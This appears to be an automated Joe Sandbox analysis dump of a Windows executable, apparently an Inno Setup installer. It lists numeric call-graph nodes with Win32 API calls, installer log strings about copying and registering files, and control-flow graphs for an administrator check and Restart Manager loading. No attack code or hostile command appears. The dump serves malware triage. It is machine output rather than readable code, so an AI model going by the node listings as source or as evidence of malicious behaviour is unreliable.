53724->53725 53725->53689 53727 4470a3 53726->53727 53728 4470aa 53726->53728 53753 446e30 18 API calls 
53727->53753 53730 431ca0 18 API calls 53728->53730 53731 4470ba 53730->53731 53731->53697 53733 43dd6c 53732->53733 53738 43dd99 53732->53738 53734 402660 4 API calls 53733->53734 53733->53738 53734->53733 53735 43ddce 53735->53702 53737 43fea5 53737->53735 53763 447024 18 API calls 53737->53763 53738->53735 53738->53737 53739 43c938 18 API calls 53738->53739 53740 447024 18 API calls 53738->53740 53742 433b18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53738->53742 53745 446e30 18 API calls 53738->53745 53747 433d18 18 API calls 53738->53747 53748 436650 18 API calls 53738->53748 53749 431c40 18 API calls 53738->53749 53754 4396e0 53738->53754 53760 436e4c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53738->53760 53761 43dc48 32 API calls 53738->53761 53762 433d34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53738->53762 53739->53738 53740->53738 53742->53738 53745->53738 53747->53738 53748->53738 53749->53738 53750->53702 53751->53700 53752->53700 53753->53728 53755 4396e9 53754->53755 53756 403400 4 API calls 53755->53756 53760->53738 53761->53738 53762->53738 53763->53737 53766 41fb58 53767 41fb61 53766->53767 53770 41fdfc 53767->53770 53769 41fb6e 53771 41feee 53770->53771 53772 41fe13 53770->53772 53771->53769 53772->53771 53791 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53772->53791 53774 41fe49 53775 41fe73 53774->53775 53776 41fe4d 53774->53776 53801 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53775->53801 53792 41fb9c 53776->53792 53780 41fe81 53782 41fe85 53780->53782 53783 41feab 53780->53783 53781 41fb9c 10 API calls 53790 41fe71 53781->53790 53784 41fb9c 10 API calls 53782->53784 53785 41fb9c 10 API calls 53783->53785 53786 41fe97 53784->53786 53787 41febd 53785->53787 53789 41fb9c 10 API calls 53786->53789 53788 41fb9c 10 API calls 53787->53788 53788->53790 53789->53790 53790->53769 53791->53774 53793 41fbb7 53792->53793 53794 41fbcd 53793->53794 53795 41f93c 4 API calls 53793->53795 
53802 41f93c 53794->53802 53795->53794 53797 41fc15 53798 41fc38 SetScrollInfo 53797->53798 53810 41fa9c 53798->53810 53801->53780 53803 4181e0 53802->53803 53804 41f959 GetWindowLongA 53803->53804 53805 41f996 53804->53805 53806 41f976 53804->53806 53822 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53805->53822 53821 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53806->53821 53809 41f982 53809->53797 53811 41faaa 53810->53811 53812 41fab2 53810->53812 53811->53781 53813 41faf1 53812->53813 53814 41fae1 53812->53814 53820 41faef 53812->53820 53824 417e48 IsWindowVisible ScrollWindow SetWindowPos 53813->53824 53823 417e48 IsWindowVisible ScrollWindow SetWindowPos 53814->53823 53815 41fb31 GetScrollPos 53815->53811 53818 41fb3c 53815->53818 53819 41fb4b SetScrollPos 53818->53819 53819->53811 53820->53815 53821->53809 53822->53809 53823->53820 53824->53820 53825 420598 53826 4205ab 53825->53826 53846 415b30 53826->53846 53828 4206f2 53829 420709 53828->53829 53853 4146d4 KiUserCallbackDispatcher 53828->53853 53833 420720 53829->53833 53854 414718 KiUserCallbackDispatcher 53829->53854 53830 420651 53851 420848 34 API calls 53830->53851 53831 4205e6 53831->53828 53831->53830 53839 420642 MulDiv 53831->53839 53835 420742 53833->53835 53855 420060 12 API calls 53833->53855 53837 42066a 53837->53828 53852 420060 12 API calls 53837->53852 53850 41a304 19 API calls 53839->53850 53842 420687 53843 4206a3 MulDiv 53842->53843 53844 4206c6 53842->53844 53843->53844 53844->53828 53845 4206cf MulDiv 53844->53845 53845->53828 53847 415b42 53846->53847 53856 414470 53847->53856 53849 415b5a 53849->53831 53850->53830 53851->53837 53852->53842 53853->53829 53854->53833 53855->53835 53857 41448a 53856->53857 53860 410458 53857->53860 53859 4144a0 53859->53849 53863 40dca4 53860->53863 53862 41045e 53862->53859 53864 40dd06 53863->53864 53865 40dcb7 53863->53865 53870 40dd14 53864->53870 53868 40dd14 33 API calls 53865->53868 53869 40dce1 53868->53869 53869->53862 
53871 40dd24 53870->53871 53873 40dd3a 53871->53873 53882 40e09c 53871->53882 53898 40d5e0 53871->53898 53901 40df4c 53873->53901 53876 40d5e0 19 API calls 53877 40dd42 53876->53877 53877->53876 53878 40ddae 53877->53878 53904 40db60 53877->53904 53879 40df4c 19 API calls 53878->53879 53881 40dd10 53879->53881 53881->53862 53918 40e96c 53882->53918 53884 403778 18 API calls 53886 40e0d7 53884->53886 53885 40e18d 53887 40e1b7 53885->53887 53888 40e1a8 53885->53888 53886->53884 53886->53885 53981 40d774 19 API calls 53886->53981 53982 40e080 19 API calls 53886->53982 53978 40ba24 53887->53978 53927 40e3c0 53888->53927 53894 40e1b5 53895 403400 4 API calls 53894->53895 53896 40e25c 53895->53896 53896->53871 53899 40ea08 19 API calls 53898->53899 53900 40d5ea 53899->53900 53900->53871 54015 40d4bc 53901->54015 54024 40df54 53904->54024 53907 40e96c 19 API calls 53908 40db9e 53907->53908 53909 40e96c 19 API calls 53908->53909 53910 40dba9 53909->53910 53911 40dbc4 53910->53911 53912 40dbbb 53910->53912 53917 40dbc1 53910->53917 54031 40d9d8 53911->54031 54034 40dac8 33 API calls 53912->54034 53915 403420 4 API calls 53916 40dc8f 53915->53916 53916->53877 53917->53915 53984 40d780 53918->53984 53921 4034e0 18 API calls 53922 40e98f 53921->53922 53923 403744 18 API calls 53922->53923 53924 40e996 53923->53924 53925 40d780 19 API calls 53924->53925 53926 40e9a4 53925->53926 53926->53886 53928 40e3ec 53927->53928 53930 40e3f6 53927->53930 53989 40d440 19 API calls 53928->53989 53931 40e511 53930->53931 53932 40e495 53930->53932 53933 40e4f6 53930->53933 53934 40e576 53930->53934 53935 40e438 53930->53935 53936 40e4d9 53930->53936 53937 40e47a 53930->53937 53938 40e4bb 53930->53938 53949 40e45c 53930->53949 53941 40d764 19 API calls 53931->53941 53997 40de24 19 API calls 53932->53997 54002 40e890 19 API calls 53933->54002 53945 40d764 19 API calls 53934->53945 53990 40d764 53935->53990 54000 40e9a8 19 API calls 53936->54000 53996 40d818 19 API calls 53937->53996 53999 40dde4 
19 API calls 53938->53999 53950 40e519 53941->53950 53944 403400 4 API calls 53951 40e5eb 53944->53951 53952 40e57e 53945->53952 53948 40e4a0 53998 40d470 19 API calls 53948->53998 53949->53944 53958 40e523 53950->53958 53959 40e51d 53950->53959 53951->53894 53960 40e582 53952->53960 53961 40e59b 53952->53961 53953 40e4e4 54001 409d38 18 API calls 53953->54001 53955 40e461 53995 40ded8 19 API calls 53955->53995 53956 40e444 53993 40de24 19 API calls 53956->53993 54003 40ea08 53958->54003 53966 40e521 53959->53966 53967 40e53c 53959->53967 53969 40ea08 19 API calls 53960->53969 54009 40de24 19 API calls 53961->54009 54007 40de24 19 API calls 53966->54007 53970 40ea08 19 API calls 53967->53970 53969->53949 53972 40e544 53970->53972 53971 40e44f 53994 40e26c 19 API calls 53971->53994 54006 40d8a0 19 API calls 53972->54006 53975 40e566 54008 40e2d4 18 API calls 53975->54008 54010 40b9d0 53978->54010 53981->53886 53982->53886 53983 40d774 19 API calls 53983->53894 53987 40d78b 53984->53987 53985 40d7c5 53985->53921 53987->53985 53988 40d7cc 19 API calls 53987->53988 53988->53987 53989->53930 53991 40ea08 19 API calls 53990->53991 53992 40d76e 53991->53992 53992->53955 53992->53956 53993->53971 53994->53949 53995->53949 53996->53949 53997->53948 53998->53949 53999->53949 54000->53953 54001->53949 54002->53949 54004 40d780 19 API calls 54003->54004 54005 40ea15 54004->54005 54005->53949 54006->53949 54007->53975 54008->53949 54009->53949 54011 40b9e2 54010->54011 54013 40ba07 54010->54013 54011->54013 54014 40ba84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54011->54014 54013->53894 54013->53983 54014->54013 54016 40ea08 19 API calls 54015->54016 54018 40d4c9 54016->54018 54017 40d4dc 54017->53877 54018->54017 54022 40eb0c 19 API calls 54018->54022 54020 40d4d7 54023 40d458 19 API calls 54020->54023 54022->54020 54023->54017 54025 40d764 19 API calls 54024->54025 54026 40df6b 54025->54026 54027 40ea08 19 API calls 54026->54027 54030 40db93 54026->54030 54028 40df78 
54027->54028 54028->54030 54035 40ded8 19 API calls 54028->54035 54030->53907 54036 40ab7c 33 API calls 54031->54036 54033 40da00 54033->53917 54034->53917 54035->54030 54036->54033 56241 40ce7c 56242 40ce84 56241->56242 56243 40ceae 56242->56243 56244 40ceb2 56242->56244 56245 40cea7 56242->56245 56247 40ceb6 56244->56247 56248 40cec8 56244->56248 56254 406288 GlobalHandle GlobalUnlock GlobalFree 56245->56254 56253 40625c GlobalAlloc GlobalLock 56247->56253 56255 40626c GlobalHandle GlobalUnlock GlobalReAlloc GlobalLock 56248->56255 56251 40cec4 56251->56243 56252 408cbc 19 API calls 56251->56252 56252->56243 56253->56251 56254->56243 56255->56251 56256 41363c SetWindowLongA GetWindowLongA 56257 413699 SetPropA SetPropA 56256->56257 56258 41367b GetWindowLongA 56256->56258 56263 41f39c 56257->56263 56258->56257 56259 41368a SetWindowLongA 56258->56259 56259->56257 56268 415270 56263->56268 56275 423c0c 56263->56275 56369 423a84 56263->56369 56264 4136e9 56269 41527d 56268->56269 56270 4152e3 56269->56270 56271 4152d8 56269->56271 56274 4152e1 56269->56274 56376 424b8c 13 API calls 56270->56376 56271->56274 56377 41505c 60 API calls 56271->56377 56274->56264 56278 423c42 56275->56278 56294 423c63 56278->56294 56378 423b68 56278->56378 56279 423cec 56281 423cf3 56279->56281 56282 423d27 56279->56282 56280 423c8d 56283 423c93 56280->56283 56284 423d50 56280->56284 56289 423cf9 56281->56289 56327 423fb1 56281->56327 56285 423d32 56282->56285 56286 42409a IsIconic 56282->56286 56290 423cc5 56283->56290 56291 423c98 56283->56291 56287 423d62 56284->56287 56288 423d6b 56284->56288 56292 4240d6 56285->56292 56293 423d3b 56285->56293 56286->56294 56298 4240ae GetFocus 56286->56298 56295 423d78 56287->56295 56296 423d69 56287->56296 56385 424194 11 API calls 56288->56385 56299 423f13 SendMessageA 56289->56299 56300 423d07 56289->56300 56290->56294 56318 423cde 56290->56318 56319 423e3f 56290->56319 56301 423df6 56291->56301 56302 423c9e 56291->56302 56399 424850 WinHelpA 
PostMessageA 56292->56399 56304 4240ed 56293->56304 56328 423cc0 56293->56328 56294->56264 56305 4241dc 11 API calls 56295->56305 56386 423b84 NtdllDefWindowProc_A 56296->56386 56298->56294 56306 4240bf 56298->56306 56299->56294 56300->56294 56300->56328 56349 423f56 56300->56349 56390 423b84 NtdllDefWindowProc_A 56301->56390 56307 423ca7 56302->56307 56308 423e1e PostMessageA 56302->56308 56316 4240f6 56304->56316 56317 42410b 56304->56317 56305->56294 56398 41eff4 GetCurrentThreadId EnumThreadWindows 56306->56398 56313 423cb0 56307->56313 56314 423ea5 56307->56314 56391 423b84 NtdllDefWindowProc_A 56308->56391 56322 423cb9 56313->56322 56323 423dce IsIconic 56313->56323 56324 423eae 56314->56324 56325 423edf 56314->56325 56315 423e39 56315->56294 56326 4244d4 19 API calls 56316->56326 56400 42452c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 56317->56400 56318->56328 56329 423e0b 56318->56329 56382 423b84 NtdllDefWindowProc_A 56319->56382 56321 4240c6 56321->56294 56333 4240ce SetFocus 56321->56333 56322->56328 56334 423d91 56322->56334 56336 423dea 56323->56336 56337 423dde 56323->56337 56393 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56324->56393 56383 423b84 NtdllDefWindowProc_A 56325->56383 56326->56294 56327->56294 56343 423fd7 IsWindowEnabled 56327->56343 56328->56294 56384 423b84 NtdllDefWindowProc_A 56328->56384 56331 424178 26 API calls 56329->56331 56331->56294 56332 423e45 56340 423e83 56332->56340 56341 423e61 56332->56341 56333->56294 56334->56294 56387 422c4c ShowWindow PostMessageA PostQuitMessage 56334->56387 56389 423b84 NtdllDefWindowProc_A 56336->56389 56388 423bc0 29 API calls 56337->56388 56350 423a84 6 API calls 56340->56350 56392 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56341->56392 56342 423eb6 56352 423ec8 56342->56352 56359 41ef58 6 API calls 56342->56359 56343->56294 56353 423fe5 56343->56353 56346 423ee5 56347 423efd 56346->56347 56354 41eea4 2 API calls 56346->56354 
56355 423a84 6 API calls 56347->56355 56349->56294 56357 423f78 IsWindowEnabled 56349->56357 56358 423e8b PostMessageA 56350->56358 56394 423b84 NtdllDefWindowProc_A 56352->56394 56362 423fec IsWindowVisible 56353->56362 56354->56347 56355->56294 56356 423e69 PostMessageA 56356->56294 56357->56294 56361 423f86 56357->56361 56358->56294 56359->56352 56395 412310 21 API calls 56361->56395 56362->56294 56364 423ffa GetFocus 56362->56364 56365 4181e0 56364->56365 56366 42400f SetFocus 56365->56366 56396 415240 56366->56396 56370 423b0d 56369->56370 56371 423a94 56369->56371 56370->56264 56371->56370 56372 423a9a EnumWindows 56371->56372 56372->56370 56373 423ab6 GetWindow GetWindowLongA 56372->56373 56401 423a1c GetWindow 56372->56401 56374 423ad5 56373->56374 56374->56370 56375 423b01 SetWindowPos 56374->56375 56375->56370 56375->56374 56376->56274 56377->56274 56379 423b72 56378->56379 56380 423b7d 56378->56380 56379->56380 56381 408720 21 API calls 56379->56381 56380->56279 56380->56280 56381->56380 56382->56332 56383->56346 56384->56294 56385->56294 56386->56294 56387->56294 56388->56294 56389->56294 56390->56294 56391->56315 56392->56356 56393->56342 56394->56294 56395->56294 56397 41525b SetFocus 56396->56397 56397->56294 56398->56321 56399->56315 56400->56315 56402 423a3d GetWindowLongA 56401->56402 56403 423a49 56401->56403 56402->56403 56404 4809f7 56405 480a00 56404->56405 56407 480a2b 56404->56407 56406 480a1d 56405->56406 56405->56407 56776 476c50 203 API calls 56406->56776 56408 480a6a 56407->56408 56778 47f4a4 18 API calls 56407->56778 56409 480a8e 56408->56409 56412 480a81 56408->56412 56413 480a83 56408->56413 56418 480aca 56409->56418 56419 480aac 56409->56419 56422 47f4e8 56 API calls 56412->56422 56780 47f57c 56 API calls 56413->56780 56414 480a22 56414->56407 56777 408be0 19 API calls 56414->56777 56415 480a5d 56779 47f50c 56 API calls 56415->56779 56783 47f33c 38 API calls 56418->56783 56423 480ac1 56419->56423 56781 47f50c 56 API calls 
56419->56781 56422->56409 56782 47f33c 38 API calls 56423->56782 56426 480ac8 56427 480ada 56426->56427 56428 480ae0 56426->56428 56429 480ade 56427->56429 56433 47f4e8 56 API calls 56427->56433 56428->56429 56431 47f4e8 56 API calls 56428->56431 56530 47c66c 56429->56530 56431->56429 56433->56429 56531 42d898 GetWindowsDirectoryA 56530->56531 56532 47c690 56531->56532 56533 403450 18 API calls 56532->56533 56534 47c69d 56533->56534 56535 42d8c4 GetSystemDirectoryA 56534->56535 56536 47c6a5 56535->56536 56537 403450 18 API calls 56536->56537 56538 47c6b2 56537->56538 56539 42d8f0 6 API calls 56538->56539 56540 47c6ba 56539->56540 56541 403450 18 API calls 56540->56541 56542 47c6c7 56541->56542 56543 47c6d0 56542->56543 56544 47c6ec 56542->56544 56815 42d208 56543->56815 56546 403400 4 API calls 56544->56546 56548 47c6ea 56546->56548 56550 47c731 56548->56550 56552 42c8cc 19 API calls 56548->56552 56549 403450 18 API calls 56549->56548 56795 47c4f4 56550->56795 56554 47c70c 56552->56554 56556 403450 18 API calls 56554->56556 56555 403450 18 API calls 56557 47c74d 56555->56557 56558 47c719 56556->56558 56559 47c76b 56557->56559 56560 4035c0 18 API calls 56557->56560 56558->56550 56562 403450 18 API calls 56558->56562 56561 47c4f4 22 API calls 56559->56561 56560->56559 56563 47c77a 56561->56563 56562->56550 56564 403450 18 API calls 56563->56564 56565 47c787 56564->56565 56566 47c7af 56565->56566 56568 42c3fc 19 API calls 56565->56568 56567 47c816 56566->56567 56569 47c4f4 22 API calls 56566->56569 56571 47c8de 56567->56571 56572 47c836 SHGetKnownFolderPath 56567->56572 56570 47c79d 56568->56570 56573 47c7c7 56569->56573 56576 4035c0 18 API calls 56570->56576 56574 47c8e7 56571->56574 56575 47c908 56571->56575 56577 47c850 56572->56577 56578 47c88b SHGetKnownFolderPath 56572->56578 56579 403450 18 API calls 56573->56579 56576->56566 56825 403ba4 21 API calls 56577->56825 56578->56571 56585 47c8a5 56578->56585 56584 47c7d4 56579->56584 56776->56414 56778->56415 
56779->56408 56780->56409 56781->56423 56782->56426 56783->56426 56796 42de1c RegOpenKeyExA 56795->56796 56797 47c51a 56796->56797 56798 47c540 56797->56798 56799 47c51e 56797->56799 56800 403400 4 API calls 56798->56800 56801 42dd4c 20 API calls 56799->56801 56802 47c547 56800->56802 56803 47c52a 56801->56803 56802->56555 56804 47c535 RegCloseKey 56803->56804 56805 403400 4 API calls 56803->56805 56804->56802 56805->56804 56816 4038a4 18 API calls 56815->56816 56817 42d21b 56816->56817 56818 42d232 GetEnvironmentVariableA 56817->56818 56822 42d245 56817->56822 56827 42dbd0 18 API calls 56817->56827 56818->56817 56819 42d23e 56818->56819 56821 403400 4 API calls 56819->56821 56821->56822 56822->56549 56827->56817
                                                                                                      Strings
                                                                                                      • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470E96
                                                                                                      • Dest filename: %s, xrefs: 00470894
                                                                                                      • Installing into GAC, xrefs: 00471714
                                                                                                      • Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
                                                                                                      • .tmp, xrefs: 00470FB7
                                                                                                      • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
                                                                                                      • User opted not to overwrite the existing file. Skipping., xrefs: 00470E4D
                                                                                                      • , xrefs: 00470BCF, 00470DA0, 00470E1E
                                                                                                      • Non-default bitness: 32-bit, xrefs: 004708BB
                                                                                                      • Same version. Skipping., xrefs: 00470CE5
                                                                                                      • Time stamp of existing file: %s, xrefs: 00470A2B
                                                                                                      • Will register the file (a type library) later., xrefs: 00471513
                                                                                                      • -- File entry --, xrefs: 004706FB
                                                                                                      • Version of existing file: %u.%u.%u.%u, xrefs: 00470B7C
                                                                                                      • Time stamp of our file: (failed to read), xrefs: 004709A7
                                                                                                      • Existing file is a newer version. Skipping., xrefs: 00470C02
                                                                                                      • Time stamp of our file: %s, xrefs: 0047099B
                                                                                                      • Version of our file: (none), xrefs: 00470AFC
                                                                                                      • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470DEC
                                                                                                      • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470CB5
                                                                                                      • Version of our file: %u.%u.%u.%u, xrefs: 00470AF0
                                                                                                      • Dest file exists., xrefs: 004709BB
                                                                                                      • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470EFA
                                                                                                      • Stripped read-only attribute., xrefs: 00470EC7
                                                                                                      • Time stamp of existing file: (failed to read), xrefs: 00470A37
                                                                                                      • Non-default bitness: 64-bit, xrefs: 004708AF
                                                                                                      • InUn, xrefs: 0047115F
                                                                                                      • Same time stamp. Skipping., xrefs: 00470D55
                                                                                                      • @, xrefs: 004707B0
                                                                                                      • Installing the file., xrefs: 00470F09
                                                                                                      • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470CD0
                                                                                                      • Couldn't read time stamp. Skipping., xrefs: 00470D35
                                                                                                      • Existing file has a later time stamp. Skipping., xrefs: 00470DCF
                                                                                                      • Incrementing shared file count (32-bit)., xrefs: 004715A5
                                                                                                      • Incrementing shared file count (64-bit)., xrefs: 0047158C
                                                                                                      • Version of existing file: (none), xrefs: 00470CFA
                                                                                                      • Failed to strip read-only attribute., xrefs: 00470ED3
                                                                                                      • Uninstaller requires administrator: %s, xrefs: 0047118F
                                                                                                      • Dest file is protected by Windows File Protection., xrefs: 004708ED
                                                                                                      • Will register the file (a DLL/OCX) later., xrefs: 0047151F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                                      • API String ID: 0-4021121268
                                                                                                      • Opcode ID: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                                      • Instruction ID: 04e5041402f80353ef90c659d92e8d378e84d4fed116f8838aecbbc27e5febe3
                                                                                                      • Opcode Fuzzy Hash: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                                      • Instruction Fuzzy Hash: 31927574A0424CDFDB21DFA9C445BDDBBB5AF05304F1480ABE848A7392D7789E49CB19

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1578 42e09c-42e0ad 1579 42e0b8-42e0dd AllocateAndInitializeSid 1578->1579 1580 42e0af-42e0b3 1578->1580 1581 42e287-42e28f 1579->1581 1582 42e0e3-42e100 GetVersion 1579->1582 1580->1581 1583 42e102-42e117 GetModuleHandleA GetProcAddress 1582->1583 1584 42e119-42e11b 1582->1584 1583->1584 1585 42e142-42e15c GetCurrentThread OpenThreadToken 1584->1585 1586 42e11d-42e12b CheckTokenMembership 1584->1586 1589 42e193-42e1bb GetTokenInformation 1585->1589 1590 42e15e-42e168 GetLastError 1585->1590 1587 42e131-42e13d 1586->1587 1588 42e269-42e27f FreeSid 1586->1588 1587->1588 1591 42e1d6-42e1fa call 402648 GetTokenInformation 1589->1591 1592 42e1bd-42e1c5 GetLastError 1589->1592 1593 42e174-42e187 GetCurrentProcess OpenProcessToken 1590->1593 1594 42e16a-42e16f call 4031bc 1590->1594 1605 42e208-42e210 1591->1605 1606 42e1fc-42e206 call 4031bc * 2 1591->1606 1592->1591 1595 42e1c7-42e1d1 call 4031bc * 2 1592->1595 1593->1589 1598 42e189-42e18e call 4031bc 1593->1598 1594->1581 1595->1581 1598->1581 1607 42e212-42e213 1605->1607 1608 42e243-42e261 call 402660 CloseHandle 1605->1608 1606->1581 1611 42e215-42e228 EqualSid 1607->1611 1615 42e22a-42e237 1611->1615 1616 42e23f-42e241 1611->1616 1615->1616 1619 42e239-42e23d 1615->1619 1616->1608 1616->1611 1619->1608
                                                                                                      APIs
                                                                                                      • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
                                                                                                      • GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
                                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
                                                                                                      • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
                                                                                                      • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
                                                                                                      • FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                                                      • API String ID: 2252812187-1888249752
                                                                                                      • Opcode ID: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                                      • Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
                                                                                                      • Opcode Fuzzy Hash: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                                      • Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1642 4502c0-4502cd 1643 4502d3-4502e0 GetVersion 1642->1643 1644 45037c-450386 1642->1644 1643->1644 1645 4502e6-4502fc LoadLibraryA 1643->1645 1645->1644 1646 4502fe-450377 GetProcAddress * 6 1645->1646 1646->1644
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(00480B52), ref: 004502D3
                                                                                                      • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
                                                                                                      • GetProcAddress.KERNEL32(6EB60000,RmStartSession), ref: 00450309
                                                                                                      • GetProcAddress.KERNEL32(6EB60000,RmRegisterResources), ref: 0045031E
                                                                                                      • GetProcAddress.KERNEL32(6EB60000,RmGetList), ref: 00450333
                                                                                                      • GetProcAddress.KERNEL32(6EB60000,RmShutdown), ref: 00450348
                                                                                                      • GetProcAddress.KERNEL32(6EB60000,RmRestart), ref: 0045035D
                                                                                                      • GetProcAddress.KERNEL32(6EB60000,RmEndSession), ref: 00450372
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoadVersion
                                                                                                      • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                                      • API String ID: 1968650500-3419246398
                                                                                                      • Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                                      • Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
                                                                                                      • Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                                      • Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
